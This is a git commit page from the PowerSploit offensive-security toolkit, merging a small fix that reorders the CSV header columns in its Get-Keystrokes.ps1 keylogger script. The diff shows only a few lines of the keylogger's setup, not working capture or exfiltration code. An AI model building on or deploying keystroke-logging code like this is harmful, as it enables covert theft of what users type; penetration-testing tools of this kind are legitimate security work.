diff options
author | Chris Campbell <obscuresec@gmail.com> | 2015-05-11 10:13:54 -0400 |
---|---|---|
committer | Chris Campbell <obscuresec@gmail.com> | 2015-05-11 10:13:54 -0400 |
commit | 2153a0a0b05ce5cdacceefeefe46b30f20caf3db (patch) | |
tree | 8ac1bbd794bb5cfb08a83db00658150319776e9e /Exfiltration | |
parent | 5b1a7750c02a3939a35f933758029bb7d9145078 (diff) | |
parent | 0045054ab09323c7434035e5a7b6381ac5dc385f (diff) | |
download | PowerSploit-2153a0a0b05ce5cdacceefeefe46b30f20caf3db.tar.gz PowerSploit-2153a0a0b05ce5cdacceefeefe46b30f20caf3db.zip |
Merge pull request #68 from hydrajump/get-keystrokes-headings-reorder
Fix for headings in wrong order
Diffstat (limited to 'Exfiltration')
-rw-r--r-- | Exfiltration/Get-Keystrokes.ps1 | 2 |
1 files changed, 1 insertions, 1 deletions
diff --git a/Exfiltration/Get-Keystrokes.ps1 b/Exfiltration/Get-Keystrokes.ps1 index 75400a1..8beaf75 100644 --- a/Exfiltration/Get-Keystrokes.ps1 +++ b/Exfiltration/Get-Keystrokes.ps1 @@ -49,7 +49,7 @@ function Get-Keystrokes { $Initilizer = { $LogPath = 'REPLACEME' - '"TypedKey","Time","WindowTitle"' | Out-File -FilePath $LogPath -Encoding unicode + '"WindowTitle","TypedKey","Time"' | Out-File -FilePath $LogPath -Encoding unicode function KeyLog { [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null |